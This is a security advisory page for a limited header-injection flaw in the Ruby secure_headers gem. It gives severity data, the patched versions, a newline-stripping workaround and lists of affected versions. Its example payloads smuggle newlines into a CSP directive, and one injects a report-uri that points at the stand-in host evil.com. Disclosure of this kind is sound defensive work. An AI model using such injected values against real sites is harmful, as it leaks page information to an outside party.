GHSA-w978-rmpf-qmwg

Suggest an improvement
Source
https://github.com/advisories/GHSA-w978-rmpf-qmwg
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/01/GHSA-w978-rmpf-qmwg/GHSA-w978-rmpf-qmwg.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-w978-rmpf-qmwg
Aliases
Published
2020-01-23T02:27:53Z
Modified
2023-11-01T04:53:20.853969Z
Severity
  • 4.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
Summary
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
Details

Impact

If user-supplied input was passed into append/overridecontentsecuritypolicydirectives, a newline could be injected leading to limited header injection.

Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.

e.g.

override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` 

would result in

Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) 
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header

Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0

Workarounds

override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])

References

https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c The effect of multiple policies

For more information

If you have any questions or comments about this advisory: * Open an issue in this repo * DM us at @ndm on twitter

References

Affected packages

RubyGems / secure_headers

Package

Name
secure_headers
Purl
pkg:gem/secure_headers

Affected ranges

Type
ECOSYSTEM
Events
Introduced
6.0.0
Fixed
6.3.0

Affected versions

6.*

6.0.0
6.1.0
6.1.1
6.1.2
6.2.0

RubyGems / secure_headers

Package

Name
secure_headers
Purl
pkg:gem/secure_headers

Affected ranges

Type
ECOSYSTEM
Events
Introduced
5.0.0
Fixed
5.2.0

Affected versions

5.*

5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.1.0

RubyGems / secure_headers

Package

Name
secure_headers
Purl
pkg:gem/secure_headers

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
3.9.0

Affected versions

0.*

0.1.0
0.1.1
0.2.0
0.2.1
0.3.0
0.4.0
0.4.1
0.4.2
0.4.3
0.5.0

1.*

1.0.0
1.1.0
1.1.1
1.2.0
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.4.0
1.4.1

2.*

2.0.0.pre
2.0.0.pre2
2.0.0
2.0.1
2.0.2
2.1.0
2.2.0
2.2.1
2.2.2
2.2.3
2.2.4
2.3.0
2.4.0
2.4.1
2.4.2
2.4.3
2.4.4
2.5.0
2.5.1
2.5.2
2.5.3

3.*

3.0.0.pre
3.0.0.pre1
3.0.0.pre2
3.0.0.pre3
3.0.0.rc1
3.0.0
3.0.1
3.0.2
3.0.3
3.1.0
3.1.1
3.1.2
3.2.0
3.3.0
3.3.1
3.3.2
3.4.0
3.4.1
3.5.0.pre
3.5.0
3.5.1
3.6.0
3.6.1
3.6.2
3.6.3
3.6.4
3.6.5
3.6.6
3.6.7
3.7.0
3.7.1
3.7.2
3.7.3
3.7.4
3.8.0